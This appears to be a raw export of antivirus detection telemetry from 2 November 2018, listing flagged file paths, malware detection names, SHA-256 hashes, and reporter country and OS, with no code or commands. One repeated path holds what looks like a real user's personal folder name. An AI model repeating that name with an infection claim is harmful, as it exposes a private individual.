  Row(detection=Row(filename='avscan-20181102-084002-4ccf6f0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_208d8027\\AVSCAN-20181102-083950-4A7033CB\\AVSCAN-20181102-084002-4CCF6F0F', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:40:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T21:57:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155319-3d929226', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47786593\\AVSCAN-20181102-155206-32FCC3D1\\AVSCAN-20181102-155319-3D929226', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:53:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-091849-c79aaa41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d948886c\\AVSCAN-20181102-091832-C5038033\\AVSCAN-20181102-091849-C79AAA41', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:18:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T13:14:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='30e1137f37f4c90814e8b85325d0453b172e8df5e31c256975fe6225a448a358', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\30E1137F37F4C90814E8B85325D0453B172E8DF5E31C256975FE6225A448A358', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='30e1137f37f4c90814e8b85325d0453b172e8df5e31c256975fe6225a448a358', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:42:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xuetr.exe', filepath='H:\\HBCD\\Programs\\XueTr.exe', filesize=64000, name='TR/Siggen.64000.12.#M1.#R1'), hash='01bb8e327211e5fff9594e791c0abb322f765b94a3d0400e7eec9dad68e3310e', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-080102-eb54da41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-080102-EB54DA41', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='4120c983faa1c641bae65541660e49d4a0105ecfd0b6662865a15e7c83294ea1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:03:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unwise.exe', filepath='C:\\Program Files\\Yahoo!\\Messenger\\UNWISE.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='37f0e3a8f4c15081ee008edae018c2704703a0dbab00136763d4de86b0e834d9', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:00:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3e8859292c3ca10adaec120d3db73e981ca6bb12446a4327d03bbc4e1cc7883b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3E8859292C3CA10ADAEC120D3DB73E981CA6BB12446A4327D03BBC4E1CC7883B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3e8859292c3ca10adaec120d3db73e981ca6bb12446a4327d03bbc4e1cc7883b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:14:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:05:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.434\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.434\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T07:44:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050708-1e70d7ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050708-1E70D7EC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hmngipoj.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\hMngIpOJ.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055249-7fd3d4b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055249-7FD3D4B5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055253-82b41823', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055253-82B41823', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151554-00929f9e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-151554-00929F9E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:19:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052503-9efb93ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052503-9EFB93CA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050751-38300af4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050751-38300AF4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.881\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.881\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T11:47:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053147-902d2d6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053147-902D2D6A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061452-94b9eb10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061452-94B9EB10', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154831-6c340c0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-154831-6C340C0F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:51:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-091144-48f23e97', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a8da7503\\AVSCAN-20181102-090916-39796E24\\AVSCAN-20181102-091144-48F23E97', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='4e8faa8504d874dfea83a0703b9800ded2f109e18a767ac7f9a0ced7de71390d', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T02:11:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061414-7e35ce1a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061414-7E35CE1A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-135541-825a15ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-135541-825A15CE', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:58:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053940-aa182907', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053940-AA182907', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-135637-8c9841f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-135637-8C9841F2', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:59:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055633-05dabec7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055633-05DABEC7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdf tender document.tar --> j111.exe', filepath='pdf TENDER DOCUMENT.tar --> J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T06:52:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054546-84113bc2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054546-84113BC2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061207-3237f56c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061207-3237F56C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051555-58634b66', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051555-58634B66', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='skzkcatq.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\SKZkcatQ.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-112154-1a29f65b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-112154-1A29F65B', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='557d360c30054743f07bc7a6f0c3266048bbfdcdd8f27f208c751ec84fc7d0d6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:23:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053040-67e7c589', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053040-67E7C589', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060226-d8063cbd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060226-D8063CBD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051817-acf3c05e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051817-ACF3C05E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060306-efb634ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060306-EFB634EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054941-10109671', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054941-10109671', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060229-d9f4308c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060229-D9F4308C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051041-9d027f9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051041-9D027F9A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061025-f5b4e27f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061025-F5B4E27F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052041-02fbde3c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052041-02FBDE3C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051614-63de00a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051614-63DE00A9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051841-bb9ca293', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051841-BB9CA293', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:40Z'), dt=datetime.date(2018, 11, 2)),
